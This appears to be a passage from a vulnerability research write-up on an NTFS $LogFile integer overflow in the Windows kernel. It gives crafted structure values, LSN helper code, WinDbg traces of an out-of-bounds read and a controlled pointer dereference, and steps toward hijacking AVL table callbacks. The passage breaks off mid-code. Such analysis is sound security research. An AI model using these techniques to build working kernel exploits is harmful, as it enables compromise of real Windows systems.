The second argument is FileOffset, but it is not an offset from the start of the disk or the filesystem: it is computed from the start of LFS_RESTART_PAGE. We can just find the magic 52 53 54 52 in our VHD and compute the tail pages from it (or we can correctly parse the NTFS BPB and get the LogFile offset from it). All we need to do is change LFS_RECORD_PAGE_HEADER->Packed.LastKnownLsn of FirstTailPage, keeping in mind that as long as the pages are correct, ntfs!LfsFindLastLsn will end by replacing the content of LastLogPage with the content of SecondTailPage. That means we should fix the content of SecondTailPage as well.
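Locating the restart page by its magic is a plain byte search. Below is a minimal C++17 sketch, assuming the VHD image has already been read into memory; the function name is hypothetical, and a naive scan like this may also match the same four bytes in unrelated data, so the result should be sanity-checked.

```cpp
#include <algorithm>
#include <array>
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// Returns the offset of the first "RSTR" magic (52 53 54 52) at or after
// `start`, or std::nullopt when the magic is not present.
std::optional<std::size_t> find_rstr_magic(const std::vector<std::uint8_t>& image,
                                           std::size_t start = 0) {
    static constexpr std::array<std::uint8_t, 4> kMagic{0x52, 0x53, 0x54, 0x52};
    if (start > image.size()) return std::nullopt;
    auto first = image.begin() + static_cast<std::ptrdiff_t>(start);
    auto it = std::search(first, image.end(), kMagic.begin(), kMagic.end());
    if (it == image.end()) return std::nullopt;
    return static_cast<std::size_t>(it - image.begin());
}
```

A FileOffset passed to ntfs!LfsPinOrMapData would then correspond to the returned offset plus FileOffset inside the image, under the assumption that the log file is stored contiguously.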

Now ntfs!InitializeRestartState will not erase our data, because ntfs!LfsCaptureClientRestartArea will not be called and Lfcb->CachedRestartArea will not be initialized. This forces ntfs!LfsReadRestartArea to read the data each time, and bCached remains zero.

Before we start crafting the RESTART_AREA to trigger the vulnerable function, we first need to locate the target RESTART_AREA, so I would like to write a few words about LSNs. An LSN (Log Sequence Number) is an index into $LogFile. It consists of a sequence number, a log page number and a log page offset. Log pages are counted from the beginning of $LogFile, that is, from the start of LFS_RESTART_PAGE.

Functions for converting an LSN to an offset and an offset back to an LSN are shown below.

std::tuple<uint64_t, uint64_t> lsn_to_offset(uint64_t lsn, PLFS_RESTART_AREA restart_area) {

auto absolute_offset = ((lsn << restart_area->SeqNumberBits) & 0xFFFFFFFFFFFFFFFF) >> (restart_area->SeqNumberBits - 3);

auto log_page_number = absolute_offset / kLogPageSize;

auto offset_in_page = absolute_offset % kLogPageSize;

return {log_page_number, offset_in_page};

}

uint64_t lsn_to_seqnum(uint64_t lsn, PLFS_RESTART_AREA restart_area) {

return lsn >> (64 - restart_area->SeqNumberBits);

}

uint64_t offset_to_lsn(uint64_t page_number, uint64_t page_offset, uint64_t sequence_number, PLFS_RESTART_AREA restart_area) {

auto absolute_offset = page_number * kLogPageSize + page_offset;

return (absolute_offset >> 3) | (sequence_number << (64 - restart_area->SeqNumberBits));

}

Let’s put everything together and enumerate all the modifications required to trigger the integer overflow.

- Fix LastKnownLsn in order to prevent the call to ntfs!LfsCaptureClientRestartArea

- Fix LFS_CLIENT_RECORD->OldestLsn to satisfy the check in ntfs!LfsReadLogRecord, which constrains TableLsn to be less than OldestLsn. That fix allows us to address any log page below LastLogPage.

- Initialize RESTART_AREA->OpenAttributeTableLength and RESTART_AREA->OpenAttributeTableLsn with the desired values.

- Initialize LFS_RECORD_HEADER at the offset pointed to by RESTART_AREA->OpenAttributeTableLsn

- Set LFS_RECORD_HEADER->ClientDataLength to ffffffffh

If we apply all of those fixes and craft LFS_RECORD_HEADER correctly, we reach the vulnerable code. A slice of the WinDbg trace that demonstrates the integer overflow is shown below.

1: kd> p

rax=fffffa07e5d6ab78 rbx=0000000000183840 rcx=ffff908cfdcdc200

rdx=0000000000000001 rsi=fffffa07e5d6ab70 rdi=ffffc60b7873cd60

rip=fffff8011e9c549b rsp=fffffa07e5d6a930 rbp=fffffa07e5d6b8e0

r8=ffffc60b736450e0 r9=0000000000000000 r10=0000000000000000

r11=0000000000000002 r12=ffff8002d04d9eb8 r13=ffff8002d0fbe4f0

r14=fffffa07e5d6ab78 r15=fffffa07e5d6aba8

iopl=0 nv up ei pl zr na po nc

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246

Ntfs!LfsFindLogRecord+0x63:

fffff801`1e9c549b 448b4118 mov r8d,dword ptr [rcx+18h] ds:002b:ffff908c`fdcdc218=ffffffff ; Here NTFS.sys loads ClientDataLength field into r8d

1: kd> p

rax=fffffa07e5d6ab78 rbx=0000000000183840 rcx=ffff908cfdcdc200

rdx=0000000000000001 rsi=fffffa07e5d6ab70 rdi=ffffc60b7873cd60

rip=fffff8011e9c549f rsp=fffffa07e5d6a930 rbp=fffffa07e5d6b8e0

r8=00000000ffffffff r9=0000000000000000 r10=0000000000000000

r11=0000000000000002 r12=ffff8002d04d9eb8 r13=ffff8002d0fbe4f0

r14=fffffa07e5d6ab78 r15=fffffa07e5d6aba8

iopl=0 nv up ei pl zr na po nc

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246

Ntfs!LfsFindLogRecord+0x67:

fffff801`1e9c549f 0fb75760 movzx edx,word ptr [rdi+60h] ds:002b:ffffc60b`7873cdc0=0030 ; Here NTFS.sys loads RecordHeaderLength field into edx

1: kd> p

rax=fffffa07e5d6ab78 rbx=0000000000183840 rcx=ffff908cfdcdc200

rdx=0000000000000030 rsi=fffffa07e5d6ab70 rdi=ffffc60b7873cd60

rip=fffff8011e9c54a3 rsp=fffffa07e5d6a930 rbp=fffffa07e5d6b8e0

r8=00000000ffffffff r9=0000000000000000 r10=0000000000000000

r11=0000000000000002 r12=ffff8002d04d9eb8 r13=ffff8002d0fbe4f0

r14=fffffa07e5d6ab78 r15=fffffa07e5d6aba8

iopl=0 nv up ei pl zr na po nc

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246

Ntfs!LfsFindLogRecord+0x6b:

fffff801`1e9c54a3 4103d0 add edx,r8d ; Here NTFS.sys adds RecordHeaderLength and ClientDataLength field and result is stored back into edx

1: kd> p

rax=fffffa07e5d6ab78 rbx=0000000000183840 rcx=ffff908cfdcdc200

rdx=000000000000002f rsi=fffffa07e5d6ab70 rdi=ffffc60b7873cd60

rip=fffff8011e9c54a6 rsp=fffffa07e5d6a930 rbp=fffffa07e5d6b8e0

r8=00000000ffffffff r9=0000000000000000 r10=0000000000000000

r11=0000000000000002 r12=ffff8002d04d9eb8 r13=ffff8002d0fbe4f0

r14=fffffa07e5d6ab78 r15=fffffa07e5d6aba8

iopl=0 nv up ei pl nz na pe cy

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040203

Ntfs!LfsFindLogRecord+0x6e:

fffff801`1e9c54a6 8bc2 mov eax,edx ; Here you can see result of add operation in edx its equal to 2fh

1: kd> p

rax=000000000000002f rbx=0000000000183840 rcx=ffff908cfdcdc200

rdx=000000000000002f rsi=fffffa07e5d6ab70 rdi=ffffc60b7873cd60

rip=fffff8011e9c54a8 rsp=fffffa07e5d6a930 rbp=fffffa07e5d6b8e0

r8=00000000ffffffff r9=0000000000000000 r10=0000000000000000

r11=0000000000000002 r12=ffff8002d04d9eb8 r13=ffff8002d0fbe4f0

r14=fffffa07e5d6ab78 r15=fffffa07e5d6aba8

iopl=0 nv up ei pl nz na pe cy

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040203

Ntfs!LfsFindLogRecord+0x70:

fffff801`1e9c54a8 483b8770010000 cmp rax,qword ptr [rdi+170h] ds:002b:ffffc60b`7873ced0=00000000001f4100 ; Here NTFS.sys compares TotalAvailable and eax

1: kd> p

rax=000000000000002f rbx=0000000000183840 rcx=ffff908cfdcdc200

rdx=000000000000002f rsi=fffffa07e5d6ab70 rdi=ffffc60b7873cd60

rip=fffff8011e9c54af rsp=fffffa07e5d6a930 rbp=fffffa07e5d6b8e0

r8=00000000ffffffff r9=0000000000000000 r10=0000000000000000

r11=0000000000000002 r12=ffff8002d04d9eb8 r13=ffff8002d0fbe4f0

r14=fffffa07e5d6ab78 r15=fffffa07e5d6aba8

iopl=0 nv up ei ng nz na pe cy

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040283

Ntfs!LfsFindLogRecord+0x77:

fffff801`1e9c54af 7d47 jge Ntfs!LfsFindLogRecord+0xc0 (fffff801`1e9c54f8) [br=0] ; The comparison is satisfied and the branch is not taken.

Now the last step is to get past the checks in ntfs!NtfsCheckLogRecord and ntfs!NtfsCheckRestartTable. I won't describe this in every detail, because it only comes down to crafting structures that satisfy the checks in both functions. Here is how I filled the fields.

...

lpNtfsLogRecordHeader->RedoOperation = 0x06;

lpNtfsLogRecordHeader->UndoOperation = 0x02;

lpNtfsLogRecordHeader->RedoOffset = 0x100;

lpNtfsLogRecordHeader->RedoLength = 0x100;

lpNtfsLogRecordHeader->UndoOffset = 0x200;

lpNtfsLogRecordHeader->UndoLength = 0x100;

lpNtfsLogRecordHeader->TargetAttribute = 0xb8;

lpNtfsLogRecordHeader->LcnsToFollow = 0x4242;

lpNtfsLogRecordHeader->RecordOffset = 0x50;

lpNtfsLogRecordHeader->AttributeOffset = 0x0;

lpNtfsLogRecordHeader->ClusterBlockOffset = 0x0;

lpNtfsLogRecordHeader->Reserved = 0;

lpNtfsLogRecordHeader->TargetVcn = 0;

lpNtfsLogRecordHeader->LcnsForPage[0] = 0;

...

lpRestartTable->EntrySize = 0x4343;

lpRestartTable->NumberEntries = 0x01;

lpRestartTable->NumberAllocated = 0x01;

lpRestartTable->Flags = 0x00;

lpRestartTable->Reserved = 0x42424242;

lpRestartTable->FreeGoal = 0x42424242;

lpRestartTable->FirstFree = 0x0;

lpRestartTable->LastFree = 0x0;

Once the RESTART_TABLE is crafted correctly, ntfs!ReadRestartTable completes successfully and we reach the following code:

1: kd> p

rax=0000000000000001 rbx=0000000000000000 rcx=0000000000000210

rdx=00000000fffdedcf rsi=ffff8002cbf1b668 rdi=00000000fffdedcf

rip=fffff8011ea23be3 rsp=fffffa07e414eac0 rbp=fffffa07e414f8e0

r8=000000005246744e r9=0000000000000001 r10=fffff80119ca9cc0

r11=fffffa07e414ea50 r12=fffffa07e414ed50 r13=ffff8002d0ddf4f0

r14=0000000000000001 r15=ffff8002d0ddf1b0

iopl=0 nv up ei pl nz na pe nc

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040202

Ntfs!InitializeRestartState+0xb17:

fffff801`1ea23be3 e8d86028fb call nt!ExAllocatePoolWithTag (fffff801`19ca9cc0)

The requested size is just under 4 GiB (rdx=fffdedcfh), so the target VM must have enough virtual memory for the allocation to succeed; otherwise the vulnerability will not be triggered at all.
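The size check traced earlier in Ntfs!LfsFindLogRecord passes because the sum is computed in a 32-bit register before it is compared with the 64-bit TotalAvailable value. Below is a minimal user-mode sketch of that arithmetic, using the values visible in the trace (RecordHeaderLength = 30h, ClientDataLength = ffffffffh, TotalAvailable = 1f4100h). The function names are hypothetical, and the 64-bit variant only illustrates what a widened sum would look like; it is not a claim about the actual fix.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Mirrors `movzx edx, word ptr [rdi+60h]` followed by `add edx, r8d`:
   the sum stays in 32 bits and silently wraps modulo 2^32. */
static uint32_t record_length_32(uint16_t record_header_length,
                                 uint32_t client_data_length)
{
    return (uint32_t)record_header_length + client_data_length;
}

/* Hypothetical widened variant: the same sum in 64 bits cannot wrap. */
static uint64_t record_length_64(uint16_t record_header_length,
                                 uint32_t client_data_length)
{
    return (uint64_t)record_header_length + (uint64_t)client_data_length;
}

/* Mirrors `cmp rax, [rdi+170h]` / `jge`: the record is accepted only
   when the (signed) length is below TotalAvailable. */
static bool passes_size_check(uint64_t length, int64_t total_available)
{
    return (int64_t)length < total_available;
}
```

With the traced inputs, the 32-bit sum is 2fh and the check passes, while the true 64-bit sum 10000002fh would be rejected.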

After nt!ExAllocatePoolWithTag successfully allocates the requested amount of memory, we reach our target memmove.

1: kd> p

rax=0000000000000000 rbx=ffffd48000000000 rcx=ffffd48000000000

rdx=ffff92079effd460 rsi=ffffd48f02609018 rdi=00000000fffdedcf

rip=fffff800544d3c1e rsp=fffffe879829fac0 rbp=fffffe87982a08e0

r8=00000000fffdedcf r9=0000000000000062 r10=00000000ffffffff

r11=0000000000030c90 r12=fffffe879829fd50 r13=ffffd48f027ed4f0

r14=0000000000000001 r15=ffffd48f027ed1b0

iopl=0 nv up ei pl zr na po nc

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246

Ntfs!InitializeRestartState+0xb52:

fffff800`544d3c1e e8dd59e8ff call Ntfs!memcpy (fffff800`54359600)

RDX holds the data source, which is the memory region where $LogFile is mapped by the Cache Manager. As you can see below, this region does not contain enough memory for the requested copy, so an out-of-bounds read happens.

Usage: System Cache

Base Address: ffff9207`9efc0000

End Address: ffff9207`9f000000

Region Size: 00000000`00040000

VA Type: SystemRange

VACB: ffffd48efca69f20 [\$LogFile]

Let's continue execution until we get a crash. As the WinDbg output below shows, the crash occurs in a different place than expected.
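Before looking at that output, the numbers shown so far already quantify the out-of-bounds read. The sketch below is a small user-mode calculation, not kernel code: it takes the source pointer from RDX (ffff9207`9effd460), the end of the System Cache region (ffff9207`9f000000), and the copy length from R8 (fffdedcfh), and splits the copy into the part that stays inside the mapped view and the part that runs past it. The helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Number of bytes that can be read from `src` before reaching `region_end`. */
static uint64_t bytes_in_bounds(uint64_t src, uint64_t region_end, uint64_t length)
{
    assert(src <= region_end);
    uint64_t available = region_end - src;
    return length < available ? length : available;
}

/* Number of bytes the copy reads beyond `region_end`. */
static uint64_t bytes_out_of_bounds(uint64_t src, uint64_t region_end, uint64_t length)
{
    return length - bytes_in_bounds(src, region_end, length);
}
```

For the traced values, only 2ba0h bytes (11,168) come from the mapped $LogFile view; the remaining fffdc22fh bytes are read from whatever follows it in the address space.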

EXCEPTION_RECORD: ffff8788b4074548 -- (.exr 0xffff8788b4074548)

ExceptionAddress: fffff80121078075 (Ntfs!NtfsCloseAttributesFromRestart+0x000000000000012d)

ExceptionCode: c0000005 (Access violation)

ExceptionFlags: 00000000

NumberParameters: 2

Parameter[0]: 0000000000000000

Parameter[1]: 0000000000000017

Attempt to read from address 0000000000000017

CONTEXT: ffff8788b4073d60 -- (.cxr 0xffff8788b4073d60)

rax=ffff9c0100200018 rbx=fffff80120f57d7c rcx=ffff9c0f44a4c4f0

rdx=ffff9c0100200018 rsi=ffff9c0f44a4c1b4 rdi=0000000000000000

rip=fffff80121078075 rsp=ffff8788b4074780 rbp=ffff8788b4075ff0

r8=ffffffffffffffff r9=000000000000435b r10=0000000000200000

r11=ffff9c0100200018 r12=ffff9c0f43caa828 r13=ffff9c0f44a4c4f0

r14=ffff8788b4075070 r15=ffff9c0f44a4c1b0

iopl=0 nv up ei ng nz na po nc

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050286

Ntfs!NtfsCloseAttributesFromRestart+0x12d:

fffff801`21078075 4d8b4818 mov r9,qword ptr [r8+18h] ds:002b:00000000`00000017=????????????????

The call stack is quite deep.

0: kd> k

# Child-SP RetAddr Call Site

00 ffff8788`b4072cc8 fffff801`1b766572 nt!DbgBreakPointWithStatus

01 ffff8788`b4072cd0 fffff801`1b765c33 nt!KiBugCheckDebugBreak+0x12

02 ffff8788`b4072d30 fffff801`1b6149b7 nt!KeBugCheck2+0xba3

03 ffff8788`b40734a0 fffff801`1b6354b4 nt!KeBugCheckEx+0x107

04 ffff8788`b40734e0 fffff801`1b5d1631 nt!PspSystemThreadStartup$filt$0+0x44

05 ffff8788`b4073520 fffff801`1b61ff4f nt!_C_specific_handler+0xa1

06 ffff8788`b4073590 fffff801`1b47b593 nt!RtlpExecuteHandlerForException+0xf

07 ffff8788`b40735c0 fffff801`1b513c3e nt!RtlDispatchException+0x2f3

08 ffff8788`b4073d30 fffff801`1b62a97c nt!KiDispatchException+0x1ae

09 ffff8788`b4074410 fffff801`1b625c63 nt!KiExceptionDispatch+0x13c

0a ffff8788`b40745f0 fffff801`21078075 nt!KiPageFault+0x463

0b ffff8788`b4074780 fffff801`21095f12 Ntfs!NtfsCloseAttributesFromRestart+0x12d

0c ffff8788`b4074830 fffff801`1b5d1721 Ntfs!NtfsMountVolume$fin$14+0xe3

0d ffff8788`b40749d0 fffff801`20ef935e nt!_C_specific_handler+0x191

0e ffff8788`b4074a40 fffff801`1b61ffcf Ntfs!_GSHandlerCheck_SEH+0x6a

0f ffff8788`b4074a70 fffff801`1b47c4f8 nt!RtlpExecuteHandlerForUnwind+0xf

10 ffff8788`b4074aa0 fffff801`1b5d167b nt!RtlUnwindEx+0x2d8

11 ffff8788`b40751d0 fffff801`20ef935e nt!_C_specific_handler+0xeb

12 ffff8788`b4075240 fffff801`1b61ff4f Ntfs!_GSHandlerCheck_SEH+0x6a

13 ffff8788`b4075270 fffff801`1b47b593 nt!RtlpExecuteHandlerForException+0xf

14 ffff8788`b40752a0 fffff801`1b4feecf nt!RtlDispatchException+0x2f3

15 ffff8788`b4075a10 fffff801`20ec28f9 nt!RtlRaiseStatus+0x4f

16 ffff8788`b4075fb0 fffff801`21033d64 Ntfs!NtfsRaiseStatusInternal+0x6d

17 ffff8788`b4075ff0 fffff801`20feb74b Ntfs!NtfsMountVolume+0x5bd4

18 ffff8788`b40767d0 fffff801`20ee75ab Ntfs!NtfsCommonFileSystemControl+0xd7

19 ffff8788`b40768b0 fffff801`1b4d8c25 Ntfs!NtfsFspDispatch+0x62b

1a ffff8788`b4076a00 fffff801`1b4ded97 nt!ExpWorkerThread+0x155

Some key points that can be learned from the call stack:

- An exception was raised, because the crash occurred in the exception handler Ntfs!NtfsMountVolume$fin$14

- The exception was raised at Ntfs!NtfsMountVolume+0x5bd4

- The exception was raised after Ntfs!NtfsRestartVolume completion



Let's deal with the exception first. It was raised because nt!IoAllocateMdl returned NULL. According to the documentation, this happens when the system is out of memory, and the status code STATUS_INSUFFICIENT_RESOURCES confirms it.



Now let's look at the memory corruption in Ntfs!NtfsCloseAttributesFromRestart. It happens at the location highlighted in red.



The value of v8 (which is in fact the FirstRestartTable variable) comes from ntfs!NtfsGetFirstRestartTable, which returns a pointer into the big buffer allocated in the previous step at Ntfs!InitializeRestartState+0xb17.

The Table pointer is initialized in Ntfs!InitializeRestartState.

This means we can control the value of the dereferenced pointer: all we need to do is create an entry that follows the logic of ntfs!NtfsGetFirstRestartTable. If we do that, we get a controllable pointer dereference.

EXCEPTION_RECORD: ffff8405913e0548 -- (.exr 0xffff8405913e0548)

ExceptionAddress: fffff80553d98075 (Ntfs!NtfsCloseAttributesFromRestart+0x000000000000012d)

ExceptionCode: c0000005 (Access violation)

ExceptionFlags: 00000000

NumberParameters: 2

Parameter[0]: 0000000000000000

Parameter[1]: ffffffffffffffff

Attempt to read from address ffffffffffffffff

CONTEXT: ffff8405913dfd60 -- (.cxr 0xffff8405913dfd60)

rax=ffffc0888ec00018 rbx=fffff80553c77d7c rcx=ffffc0888e8364f0

rdx=ffffc0888ec00018 rsi=ffffc0888e8361b4 rdi=0000000000000000

rip=fffff80553d98075 rsp=ffff8405913e0780 rbp=ffff8405913e1ff0

r8=4141414141414141 r9=000000000000435b r10=000000008ec00000

r11=ffffc0888ec00018 r12=ffffc0888a6aad38 r13=ffffc0888e8364f0

r14=ffff8405913e1070 r15=ffffc0888e8361b0

iopl=0 nv up ei ng nz na po nc

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050286

Ntfs!NtfsCloseAttributesFromRestart+0x12d:

fffff805`53d98075 4d8b4818 mov r9,qword ptr [r8+18h] ds:002b:41414141`41414159=????????????????

Resetting default scope

And of course, everything that was copied during the out-of-bounds read remains in pool memory, which makes it possible to obtain some useful leaks.

ffffba84`4c200018 ff ff ff ff 42 42 42 42-42 42 42 42 42 42 42 42 ....BBBBBBBBBBBB

ffffba84`4c200028 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

ffffba84`4c200038 41 41 41 41 41 41 41 41-ff ff ff ff ff ff ff ff AAAAAAAA........

...

ffffba84`4c202ba8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ - - -

ffffba84`4c202bb8 00 00 00 00 00 00 00 00-34 00 38 00 39 00 30 00 ........4.8.9.0. |

ffffba84`4c202bc8 45 00 46 00 46 00 34 00-31 00 33 00 34 00 38 00 E.F.F.4.1.3.4.8. |

ffffba84`4c202bd8 41 00 32 00 44 00 33 00-46 00 41 00 31 00 30 00 A.2.D.3.F.A.1.0. |

ffffba84`4c202be8 34 00 41 00 38 00 35 00-43 00 38 00 30 00 37 00 4.A.8.5.C.8.0.7. |

ffffba84`4c202bf8 35 00 45 00 32 00 30 00-45 00 30 00 32 00 35 00 5.E.2.0.E.0.2.5. |

ffffba84`4c202c08 46 00 37 00 43 00 46 00-34 00 30 00 44 00 30 00 F.7.C.F.4.0.D.0. - Leaked Data

ffffba84`4c202c18 30 00 34 00 45 00 32 00-42 00 43 00 31 00 43 00 0.4.E.2.B.C.1.C. |

ffffba84`4c202c28 33 00 43 00 39 00 41 00-41 00 35 00 34 00 38 00 3.C.9.A.A.5.4.8. |

ffffba84`4c202c38 36 00 35 00 46 00 34 00-97 81 50 e2 04 94 db 01 6.5.F.4...P..... |

ffffba84`4c202c48 af 00 3e 3d d3 61 d8 01-9c 00 00 00 00 00 00 00 ..>=.a.......... |

ffffba84`4c202c58 00 00 3a 00 00 00 c6 44-80 de 6b 39 db 01 14 00 ..:....D..k9.... |

ffffba84`4c202c68 00 00 04 00 00 00 01 79-00 00 80 00 57 44 4d 43 .......y....WDMC - - -

Exploitation



We can hijack a pointer to an OpenAttributeTable structure. The memory layout of the hijacked structure is shown below:

00000000 struct OPEN_ATTRIBUTE_DATA // sizeof=0x30

00000000 {

00000000 LIST_ENTRY Links;

00000010 __int32 OnDiskAttributeIndex;

00000014 __int8 AttributeNamePresent;

00000015 // padding byte

00000016 // padding byte

00000017 // padding byte

00000018 __int64 Scb;

00000020 UNICODE_STRING AttributeName;

00000030 };

The structure contains three interesting fields:

- Links. The real type of this field is LIST_ENTRY. This field is notable because any insert or delete operation results in memory writes, and we control the pointer values. However, Microsoft’s list security mitigations, such as safe unlinking, harden it. More information can be found here.

- AttributeName. A UNICODE_STRING field. There are many ways to potentially abuse this (e.g., memset, memcpy, free, etc.).

- Scb. The real type of this field is SCB: a pointer to the Stream Control Block, which in turn points to structures like FCB (File Control Block), FILE_OBJECT, and even VCB (Volume Control Block)!
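To make the offsets of these fields easy to check, the layout above can be written as a C model with compile-time assertions. This is only a sketch: the `_MODEL` type names are hypothetical, pointers are modeled as 64-bit integers so the offsets hold on any host, and the link to the faulting instruction assumes that r8 holds the hijacked structure pointer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 64-bit LIST_ENTRY and UNICODE_STRING modeled with fixed-width integers. */
typedef struct { uint64_t Flink; uint64_t Blink; } LIST_ENTRY64_MODEL;
typedef struct {
    uint16_t Length;
    uint16_t MaximumLength;
    uint32_t Padding;
    uint64_t Buffer;
} UNICODE_STRING64_MODEL;

typedef struct {
    LIST_ENTRY64_MODEL Links;              /* 0x00 */
    int32_t OnDiskAttributeIndex;          /* 0x10 */
    int8_t AttributeNamePresent;           /* 0x14 */
    uint8_t Padding[3];                    /* 0x15 */
    uint64_t Scb;                          /* 0x18 */
    UNICODE_STRING64_MODEL AttributeName;  /* 0x20 */
} OPEN_ATTRIBUTE_DATA_MODEL;

_Static_assert(sizeof(OPEN_ATTRIBUTE_DATA_MODEL) == 0x30, "sizeof must be 0x30");
_Static_assert(offsetof(OPEN_ATTRIBUTE_DATA_MODEL, OnDiskAttributeIndex) == 0x10, "index");
_Static_assert(offsetof(OPEN_ATTRIBUTE_DATA_MODEL, AttributeNamePresent) == 0x14, "flag");
_Static_assert(offsetof(OPEN_ATTRIBUTE_DATA_MODEL, AttributeName) == 0x20, "name");

/* Offset of Scb; it equals the +18h displacement in
   `mov r9, qword ptr [r8+18h]` (assuming r8 is the hijacked pointer). */
static size_t scb_offset(void)
{
    return offsetof(OPEN_ATTRIBUTE_DATA_MODEL, Scb);
}
```

A model like this is handy when laying out a fake structure byte by byte, because a misplaced field fails at compile time rather than at mount time.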

This hijacked structure looks quite promising. Let’s now examine code that uses it.

At first glance, ntfs!NtfsCloseAttributesFromRestart doesn’t appear to perform any useful reads or writes on the hijacked fields.

That said, we do gain the ability to free an arbitrary pointer. While this opens the door to potential use-after-free (UAF) conditions in certain Windows subsystems or objects, it’s unclear what exactly we can free in this context, and overall the resulting exploit path looks unreliable. So, is there a better option?

if ( v12->AttributeNamePresent )

{

NtfsFreeScbAttributeName(v12->AttributeName.Buffer);

v11->OatData->AttributeName.Buffer = 0LL;

}

Yes. Scroll further in the decompiled function and you’ll find this little princess.

if ( (Fcb->FcbState & 0x40) != 0 ) {

v37 = 0LL;

Buffer = v14;

RtlDeleteElementGenericTableAvl(&Fcb->Vcb->FcbTable, &Buffer); // <--- our little princess

lpScb->Fcb->FcbState &= ~0x40u;

NtfsDereferenceMftView((__int64)lpScb->Fcb->Vcb, &v33, 1);

}

If you’re familiar with how the Windows kernel implements maps, you’re probably already laughing. If not, allow me to introduce you to AVL trees. The generic table implementation is based on a self-balancing AVL tree. These trees are designed to be generic via callback-based extensibility. The key callbacks are:

- CompareRoutine

- AllocateRoutine

- FreeRoutine

Luckily, the _RTL_AVL_TABLE layout is available via public symbols, and the decompiled code of nt!RtlDeleteElementGenericTableAvl is fairly straightforward.

if ( !Table->NumberGenericTableElements )

return 0;

RightChild = Table->BalancedRoot.RightChild;

while ( 1 )

{

v5 = Table->CompareRoutine(Table, Buffer, &RightChild[1]);

if ( v5 == GenericLessThan )

{

RightChild = RightChild->LeftChild;

goto LABEL_7;

}

if ( v5 != GenericGreaterThan )

break;

RightChild = RightChild->RightChild;

LABEL_7:

if ( !RightChild )

return 0;

}

if ( RightChild == Table->RestartKey )

Table->RestartKey = (_RTL_BALANCED_LINKS *)RealPredecessor(RightChild);

++Table->DeleteCount;

DeleteNodeFromTree(Table, RightChild);

--Table->NumberGenericTableElements;

Table->WhichOrderedElement = 0;

Table->OrderedPointer = 0LL;

Table->FreeRoutine(Table, RightChild);

Here’s the memory layout of _RTL_AVL_TABLE and _RTL_BALANCED_LINKS:

00000000 struct _RTL_AVL_TABLE // sizeof=0x68

00000000 {

00000000 _RTL_BALANCED_LINKS BalancedRoot;

00000020 void *OrderedPointer;

00000028 unsigned int WhichOrderedElement;

0000002C unsigned int NumberGenericTableElements;

00000030 unsigned int DepthOfTree;

00000034 // padding byte

00000035 // padding byte

00000036 // padding byte

00000037 // padding byte

00000038 _RTL_BALANCED_LINKS *RestartKey;

00000040 unsigned int DeleteCount;

00000044 // padding byte

00000045 // padding byte

00000046 // padding byte

00000047 // padding byte

00000048 _RTL_GENERIC_COMPARE_RESULTS (__fastcall *CompareRoutine)(_RTL_AVL_TABLE *, void *, void *);

00000050 void *(__fastcall *AllocateRoutine)(_RTL_AVL_TABLE *, unsigned int);

00000058 void (__fastcall *FreeRoutine)(_RTL_AVL_TABLE *, void *);

00000060 void *TableContext;

00000068 };

00000000 struct __declspec(align(8)) _RTL_BALANCED_LINKS // sizeof=0x20

00000000 {

00000000 _RTL_BALANCED_LINKS *Parent;

00000008 _RTL_BALANCED_LINKS *LeftChild;

00000010 _RTL_BALANCED_LINKS *RightChild;

00000018 char Balance;

00000019 unsigned __int8 Reserved[3];

0000001C // padding byte

0000001D // padding byte

0000001E // padding byte

0000001F // padding byte

00000020 };

From this decompiled logic, we see a juicy opportunity to hijack control flow via CompareRoutine or FreeRoutine. The caveat: both are protected by kCFG (Kernel Control Flow Guard), so arbitrary ROP isn’t feasible here.
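To see why a fake table hands over the indirect call, here is a simplified user-mode model of the lookup loop from the listing above. It is a sketch under stated assumptions: `LINKS`, `TABLE`, `find_node`, and the demo data are hypothetical stand-ins that keep only the fields the walk touches, not the real kernel definitions.

```c
#include <assert.h>
#include <stddef.h>

typedef enum { GenericLessThan, GenericGreaterThan, GenericEqual } COMPARE_RESULT;

/* Simplified stand-in for _RTL_BALANCED_LINKS. */
typedef struct LINKS {
    struct LINKS *Parent, *LeftChild, *RightChild;
    char Balance;
} LINKS;

struct TABLE;
typedef COMPARE_RESULT (*COMPARE_ROUTINE)(struct TABLE *, void *, void *);

/* Simplified stand-in for _RTL_AVL_TABLE. */
typedef struct TABLE {
    LINKS BalancedRoot;
    unsigned NumberGenericTableElements;
    COMPARE_ROUTINE CompareRoutine;
} TABLE;

/* Same walk as the decompiled loop: every step is an indirect call through
   table->CompareRoutine, and the third argument is the memory right after
   the links header (node + 1). */
static LINKS *find_node(TABLE *table, void *key)
{
    if (!table->NumberGenericTableElements)
        return NULL;
    LINKS *node = table->BalancedRoot.RightChild;
    for (;;) {
        COMPARE_RESULT r = table->CompareRoutine(table, key, node + 1);
        if (r == GenericLessThan)
            node = node->LeftChild;
        else if (r == GenericGreaterThan)
            node = node->RightChild;
        else
            return node;
        if (!node)
            return NULL;
    }
}

/* Demo data: three nodes whose user data is a single int key. */
typedef struct { LINKS Links; int Key; } INT_NODE;

static INT_NODE g_left  = { { NULL, NULL, NULL, 0 }, 10 };
static INT_NODE g_right = { { NULL, NULL, NULL, 0 }, 30 };
static INT_NODE g_root  = { { NULL, &g_left.Links, &g_right.Links, 0 }, 20 };
static const void *g_last_user_data; /* third argument of the last callback */

static COMPARE_RESULT compare_int(struct TABLE *table, void *key, void *user_data)
{
    (void)table;
    g_last_user_data = user_data;
    int a = *(int *)key, b = *(int *)user_data;
    return a < b ? GenericLessThan : a > b ? GenericGreaterThan : GenericEqual;
}

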